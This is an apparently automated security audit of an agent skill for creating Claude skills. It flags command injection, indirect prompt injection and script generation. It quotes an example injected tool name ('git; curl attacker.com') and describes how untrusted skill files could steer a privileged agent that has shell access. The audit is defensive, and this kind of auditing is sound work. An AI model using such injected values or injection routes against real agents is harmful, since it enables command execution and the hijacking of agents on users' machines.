creating-agent-skills

Fail

Audited by Gen Agent Trust Hub on Feb 15, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION, REMOTE_CODE_EXECUTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill executes arbitrary CLI commands based on text extracted from other files.
      ◦ Evidence: In workflows/verify-skill.md, the agent is instructed to extract tool names from skill files and run which {tool-name} and {tool-name} --version. A maliciously crafted skill file could include shell metacharacters in a tool name (e.g., git; curl attacker.com) to achieve command injection during the verification process.
  • PROMPT_INJECTION (HIGH): Vulnerable to Indirect Prompt Injection (Category 8) because untrusted data is processed with high-privilege capabilities.
      ◦ Ingestion points: workflows/audit-skill.md, workflows/verify-skill.md, and workflows/upgrade-to-router.md read file content from the ~/.claude/skills/ directory.
      ◦ Boundary markers: No explicit boundary markers or instruction-ignoring delimiters are used when reading or processing the content of audited skills.
      ◦ Capability inventory: The skill can write files (mkdir -p, cat >), modify file permissions (chmod +x), and execute shell commands (bash, which, python).
      ◦ Sanitization: No sanitization is performed on the 'verifiable claims' or 'tool names' extracted from external skills before they are used in shell commands or documentation generation.
  • REMOTE_CODE_EXECUTION (MEDIUM): The skill dynamically generates and executes scripts.
      ◦ Evidence: workflows/add-script.md creates shell, Python, or Node scripts and makes them executable with chmod +x. While intended as a developer utility, this mechanism could also be used to create persistence or malicious logic.
  • CREDENTIALS_UNSAFE (SAFE): The skill explicitly addresses credential safety in references/api-security.md, recommending a secure wrapper script and environment-variable storage in ~/.claude/.env so that keys do not appear in chat logs.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 15, 2026, 09:16 PM